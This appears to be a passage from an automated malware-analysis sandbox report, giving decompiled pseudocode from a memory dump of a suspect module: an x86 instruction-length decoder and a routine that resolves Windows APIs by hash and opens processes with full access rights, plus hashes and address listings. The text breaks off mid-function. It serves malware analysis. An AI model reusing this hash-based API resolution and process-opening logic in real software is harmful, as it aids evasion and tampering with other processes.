Instruction Fuzzy Hash: 38127F715483029FC715DF28CA80A6FBBB5AF95710F508A5DE8AA972BDDB30DD01CB42

Uniqueness

Uniqueness Score: -1.00%

Function 72AE92DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E72AE92DC(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E72AE35D4( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x72ae92e3
0x72ae92e7
0x72ae92f3
0x72ae92f7
0x72ae92fb
0x72ae9300
0x72ae9303
0x72ae9305
0x72ae9307
0x72ae9307
0x72ae930a
0x72ae9310
0x72ae9388
0x72ae938c
0x72ae938f
0x72ae938f
0x72ae9392
0x00000000
0x72ae9392
0x72ae9317
0x72ae937f
0x72ae9383
0x00000000
0x72ae9383
0x72ae931e
0x72ae9377
0x72ae937a
0x00000000
0x72ae937a
0x72ae9323
0x72ae9361
0x72ae9368
0x72ae936b
0x72ae9334
0x72ae9334
0x72ae933a
0x00000000
0x00000000
0x72ae933f
0x72ae9359
0x72ae935c
0x00000000
0x72ae935c
0x72ae9344
0x00000000
0x72ae9346
0x72ae934a
0x72ae934d
0x00000000
0x72ae934d
0x72ae9344
0x72ae9395
0x72ae9395
0x72ae9395
0x72ae939e
0x72ae93a7
0x72ae93aa
0x72ae93ad
0x72ae93b0
0x72ae93b3
0x72ae93b9
0x72ae93fb
0x72ae93fe
0x72ae93ff
0x72ae9406
0x72ae9409
0x72ae93bb
0x72ae93bf
0x72ae93c9
0x72ae93d0
0x72ae93d2
0x72ae93eb
0x72ae93ee
0x72ae93ee
0x72ae93d0
0x72ae9411
0x72ae9414
0x72ae9417
0x72ae941b
0x72ae941f
0x72ae9429
0x72ae942d
0x72ae9437
0x72ae9440
0x72ae944d
0x72ae9450
0x72ae9453
0x72ae9453
0x72ae945f
0x72ae946a
0x72ae9470
0x72ae9474
0x72ae9461
0x72ae9461
0x72ae9461
0x72ae947c
0x72ae94a6
0x72ae94ac
0x72ae94ac
0x72ae94b4
0x72ae985d
0x72ae9863
0x72ae9869
0x72ae9869
0x00000000
0x72ae94ba
0x72ae94ba
0x72ae94be
0x72ae94c1
0x72ae94c4
0x72ae94c7
0x72ae94cb
0x72ae94cd
0x72ae94d0
0x72ae94d3
0x72ae94d7
0x72ae94dc
0x72ae94df
0x72ae94e3
0x72ae94e8
0x72ae94eb
0x72ae94ed
0x72ae94f0
0x72ae94f4
0x72ae94f9
0x72ae9509
0x72ae950f
0x72ae950f
0x72ae9517
0x72ae9519
0x72ae9522
0x72ae9524
0x72ae9527
0x72ae9532
0x72ae955f
0x72ae9534
0x72ae954b
0x72ae954b
0x72ae9567
0x72ae956d
0x72ae9573
0x72ae9573
0x72ae9567
0x72ae9522
0x72ae957a
0x72ae95eb
0x72ae95f0
0x72ae9649
0x72ae970b
0x72ae9710
0x72ae971f
0x72ae9725
0x72ae9729
0x72ae9732
0x72ae9739
0x72ae9742
0x72ae9750
0x72ae9753
0x72ae973b
0x72ae973b
0x72ae973b
0x72ae9739
0x72ae975c
0x72ae9789
0x72ae979c
0x72ae97a4
0x72ae978b
0x72ae978d
0x72ae9795
0x72ae9795
0x72ae975e
0x72ae9763
0x72ae9782
0x72ae9765
0x72ae976a
0x72ae977b
0x72ae976c
0x72ae976c
0x72ae976c
0x72ae976a
0x72ae9763
0x72ae97ac
0x72ae97bb
0x72ae97c8
0x72ae97d1
0x72ae97d5
0x72ae97d9
0x72ae97dc
0x72ae97df
0x72ae97e2
0x72ae97e5
0x72ae97e8
0x72ae97ee
0x72ae97f2
0x72ae97f8
0x72ae97f8
0x72ae97ee
0x72ae97fe
0x72ae983b
0x72ae983f
0x72ae9846
0x72ae984c
0x72ae9800
0x72ae9803
0x72ae9823
0x72ae9827
0x72ae982e
0x72ae9835
0x72ae9805
0x72ae9808
0x72ae980a
0x72ae980e
0x72ae9818
0x72ae981e
0x72ae981e
0x72ae9808
0x72ae9803
0x72ae9853
0x72ae9853
0x72ae986c
0x72ae986c
0x72ae9872
0x72ae9877
0x72ae98d1
0x72ae98d6
0x72ae9915
0x72ae991a
0x72ae991c
0x72ae9920
0x72ae9923
0x72ae9926
0x72ae9928
0x72ae9929
0x72ae9929
0x72ae992e
0x72ae994c
0x72ae994e
0x72ae9952
0x72ae9958
0x72ae995b
0x72ae995d
0x72ae995e
0x72ae995e
0x00000000
0x72ae9930
0x72ae9930
0x72ae9930
0x72ae9934
0x72ae993a
0x72ae993d
0x72ae993f
0x72ae9942
0x72ae9961
0x72ae9961
0x72ae9968
0x72ae9982
0x72ae996a
0x72ae996a
0x72ae9976
0x72ae9977
0x72ae997a
0x72ae997a
0x72ae9990
0x72ae9990
0x72ae992e
0x72ae98db
0x72ae98e9
0x72ae9901
0x72ae9905
0x72ae9908
0x72ae990e
0x72ae9912
0x72ae9912
0x00000000
0x72ae9912
0x72ae98eb
0x72ae98ef
0x72ae98f5
0x72ae98f5
0x72ae98fb
0x00000000
0x72ae98fb
0x72ae98dd
0x72ae98e1
0x00000000
0x72ae98e1
0x72ae987b
0x72ae98a7
0x72ae98bf
0x72ae98c3
0x72ae98c6
0x72ae98c9
0x72ae98cb
0x72ae98ce
0x72ae98a9
0x72ae98a9
0x72ae98ad
0x72ae98b0
0x72ae98b3
0x72ae98b6
0x72ae98b9
0x72ae98b9
0x00000000
0x72ae98a7
0x72ae9881
0x00000000
0x00000000
0x72ae9887
0x72ae988b
0x72ae9891
0x72ae9894
0x72ae9897
0x72ae989a
0x00000000
0x72ae989a
0x72ae9712
0x72ae9716
0x72ae971c
0x00000000
0x72ae971c
0x72ae9654
0x72ae9666
0x72ae966b
0x72ae96d6
0x00000000
0x00000000
0x72ae96dd
0x72ae9703
0x72ae9707
0x00000000
0x00000000
0x72ae96e6
0x72ae96eb
0x72ae96ff
0x00000000
0x00000000
0x00000000
0x72ae9701
0x72ae96f2
0x00000000
0x00000000
0x72ae96f7
0x00000000
0x00000000
0x72ae96f9
0x00000000
0x72ae96dd
0x72ae966d
0x72ae9677
0x72ae9688
0x72ae968b
0x72ae968e
0x72ae9694
0x00000000
0x00000000
0x00000000
0x00000000
0x72ae969a
0x72ae969a
0x72ae969a
0x72ae96a1
0x00000000
0x00000000
0x72ae96a3
0x72ae96a6
0x72ae96ac
0x00000000
0x00000000
0x00000000
0x72ae96ae
0x72ae96b0
0x72ae96b9
0x00000000
0x00000000
0x72ae96cd
0x00000000
0x00000000
0x00000000
0x72ae96cf
0x72ae965b
0x00000000
0x00000000
0x00000000
0x72ae9661
0x72ae95f5
0x72ae9624
0x72ae9625
0x72ae962e
0x00000000
0x72ae963f
0x00000000
0x72ae963f
0x72ae95fc
0x72ae95ff
0x72ae9612
0x72ae9613
0x72ae9617
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x72ae95ff
0x72ae95f5
0x72ae9581
0x72ae95de
0x72ae95e2
0x72ae95e8
0x00000000
0x72ae95e8
0x72ae9583
0x72ae9587
0x72ae9594
0x72ae9598
0x72ae95ae
0x72ae95b6
0x72ae959a
0x72ae959c
0x72ae95a6
0x72ae95a6
0x72ae95bc
0x72ae95c5
0x72ae95dc
0x00000000
0x00000000
0x00000000
0x72ae95dc
0x72ae95c7
0x72ae95c7
0x00000000
0x72ae95bc

Strings

, xrefs: 72AE9947

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction ID: dcf3d6587b598af34fe622c4742f249d4026002d10efe79ff79ab0d26d1e00f8
Opcode Fuzzy Hash: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction Fuzzy Hash: 5D22A470808396CBD715CF19C49376ABBF1BF89304F00886EE9D747299D3359A5ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 72AD84E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E72AD84E4(signed int __ecx, intOrPtr __edx) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t316;
				intOrPtr _t318;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				void* _t345;
				void* _t416;
				signed int _t417;
				signed int _t424;
				signed int _t432;
				intOrPtr* _t433;
				intOrPtr* _t434;
				signed int _t437;
				signed int _t441;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				void* _t451;
				signed int _t452;
				void* _t453;
				signed int _t454;
				void* _t457;
				intOrPtr* _t458;

				_push(_t435);
				_t458 = _t457 - 0xa4;
				 *_t458 = __ecx + 0x1c;
				 *((intOrPtr*)(_t458 + 0x68)) = __edx;
				 *(_t458 + 4) = __ecx;
				 *(_t458 + 0x84) = 0;
				 *((intOrPtr*)(_t458 + 0x78)) = __ecx + 4;
				while(1) {
					_t415 =  *(_t458 + 0x6c);
					E72ADB714(_t458 + 0x24,  *(_t458 + 0x6c), 0x7fffffff);
					if(E72ADF56C(_t458 + 0x24) == 0) {
						goto L3;
					} else {
						 *( *(_t458 + 4) + 0x2c) = 0;
						E72ADF6F0(_t458 + 0x24);
					}
					L60:
					_t318 = 0xffffffffffffffff;
					L62:
					if(_t318 != 0) {
						L65:
						return _t318;
					} else {
						if( *(_t458 + 0x84) != 0x20) {
							E72AE218C(0x5dc, _t415, _t435);
							 *(_t458 + 0x84) =  *(_t458 + 0x84) + 1;
							continue;
						} else {
							_t318 = 0xffffffffffffffff;
							goto L65;
						}
					}
					L71:
					L3:
					__eflags =  *( *(_t458 + 4));
					if( *( *(_t458 + 4)) > 0) {
						_t326 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x64) = _t326 * 4;
							_t434 = E72ADF558( *(_t458 + 0x7c), _t326 * 4);
							_t435 =  *(_t458 + 0x20);
							__eflags = _t435;
							if(_t435 <= 0) {
								L11:
								_t435 =  *(_t458 + 4) + 4;
								_t283 = E72ADF568( *(_t458 + 4) + 4);
								__eflags = _t283 -  *(_t458 + 0x64);
								if(_t283 >  *(_t458 + 0x64)) {
									_t451 = 4 + _t326 * 4;
									_t299 = E72ADF568(_t435);
									__eflags = _t299 - _t451;
									if(_t299 > _t451) {
										 *((intOrPtr*)(_t458 + 0x9c)) = E72ADF558(_t435,  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0x98)) = E72ADF558(_t435, _t451);
										E72AE382C( *((intOrPtr*)(_t458 + 0xa4)),  *((intOrPtr*)(_t458 + 0x9c)), E72ADF568(_t435) - _t451);
										_t458 = _t458 + 0xc;
									}
									E72ADF8C4(_t435, E72ADF568(_t435) + 0xfffffffc);
									_t308 =  *(_t458 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t450 = E72AE2F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t450;
								if(_t450 != 0) {
									 *_t450( *(E72ADF558( *(_t458 + 4),  *(_t458 + 0x64))));
								}
								_t285 = E72ADF568( *_t458);
								__eflags = _t285 -  *(_t458 + 0x64);
								if(_t285 >  *(_t458 + 0x64)) {
									_t453 = 4 + _t326 * 4;
									_t287 = E72ADF568( *_t458);
									__eflags = _t287 - _t453;
									if(_t287 > _t453) {
										_t435 = E72ADF558( *(_t458 + 4),  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0xa0)) = E72ADF558( *(_t458 + 4), _t453);
										E72AE382C(_t288,  *((intOrPtr*)(_t458 + 0xa4)), E72ADF568( *_t458) - _t453);
										_t458 = _t458 + 0xc;
									}
									E72ADF8C4( *(_t458 + 4), E72ADF568( *_t458) + 0xfffffffc);
									_t296 =  *(_t458 + 4);
									_t33 = _t296 + 0x18;
									 *_t33 =  *(_t296 + 0x18) - 1;
									__eflags =  *_t33;
								}
								_t326 = _t326 - 1;
								__eflags = _t326;
							} else {
								_t452 = 0;
								__eflags = 0;
								while(1) {
									_t310 = E72ADF558(_t458 + 0x28, _t452 * 4);
									__eflags =  *_t310 -  *_t434;
									if( *_t310 ==  *_t434) {
										break;
									}
									_t452 = _t452 + 1;
									__eflags = _t452 - _t435;
									if(_t452 < _t435) {
										continue;
									} else {
										goto L11;
									}
									goto L20;
								}
								__eflags = _t452 - 0xffffffff;
								if(_t452 == 0xffffffff) {
									goto L11;
								} else {
								}
							}
							L20:
							_t326 = _t326 + 1;
							__eflags = _t326 -  *( *(_t458 + 4));
						} while (_t326 <  *( *(_t458 + 4)));
					}
					__eflags =  *(_t458 + 0x20);
					if( *(_t458 + 0x20) > 0) {
						_t325 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x7c) = _t325 * 4;
							_t433 = E72ADF558(_t458 + 0x28, _t325 * 4);
							_t258 =  *(_t458 + 4);
							_t435 =  *_t258;
							__eflags = _t435;
							if(_t435 <= 0) {
								L29:
								_t445 = E72AE2F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t445;
								if(_t445 != 0) {
									_t447 =  *_t445(0x1fffff, 0,  *((intOrPtr*)(E72ADF558(_t458 + 0x28,  *(_t458 + 0x7c)))));
									__eflags = _t447;
									if(_t447 != 0) {
										E72ADF8C4( *(_t458 + 4), E72ADF568( *_t458) + 4);
										 *(E72ADF558( *(_t458 + 4), E72ADF568( *_t458) + 0xfffffffc)) = _t447;
										 *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E72ADF558(_t458 + 0x28,  *(_t458 + 0x7c));
										 *((intOrPtr*)(_t458 + 0x70)) =  *(_t458 + 4) + 4;
										E72ADF8C4( *((intOrPtr*)(_t458 + 0x74)), E72ADF568( *(_t458 + 4) + 4) + 4);
										 *((intOrPtr*)(E72ADF558( *((intOrPtr*)(_t458 + 0x74)), E72ADF568( *((intOrPtr*)(_t458 + 0x70))) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t458 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
							} else {
								_t446 = 0;
								__eflags = 0;
								 *(_t458 + 0x88) =  &(_t258[1]);
								while(1) {
									_t279 = E72ADF558( *((intOrPtr*)(_t458 + 0x8c)), _t446 * 4);
									__eflags =  *_t279 -  *_t433;
									if( *_t279 ==  *_t433) {
										break;
									}
									_t446 = _t446 + 1;
									__eflags = _t446 - _t435;
									if(_t446 < _t435) {
										continue;
									} else {
										goto L29;
									}
									goto L32;
								}
								__eflags = _t446 - 0xffffffff;
								if(_t446 == 0xffffffff) {
									goto L29;
								} else {
								}
							}
							L32:
							_t325 = _t325 + 1;
							__eflags = _t325 -  *(_t458 + 0x20);
						} while (_t325 <  *(_t458 + 0x20));
					}
					E72ADF6F0(_t458 + 0x24);
					_t173 =  *(_t458 + 4);
					__eflags = _t173[0xb];
					if(_t173[0xb] != 0) {
						_t432 =  *_t173;
						__eflags = _t432;
						if(_t432 > 0) {
							_t435 = 0;
							__eflags = 0;
							_t324 =  &(_t173[1]);
							while(1) {
								_t441 = _t435 * 4;
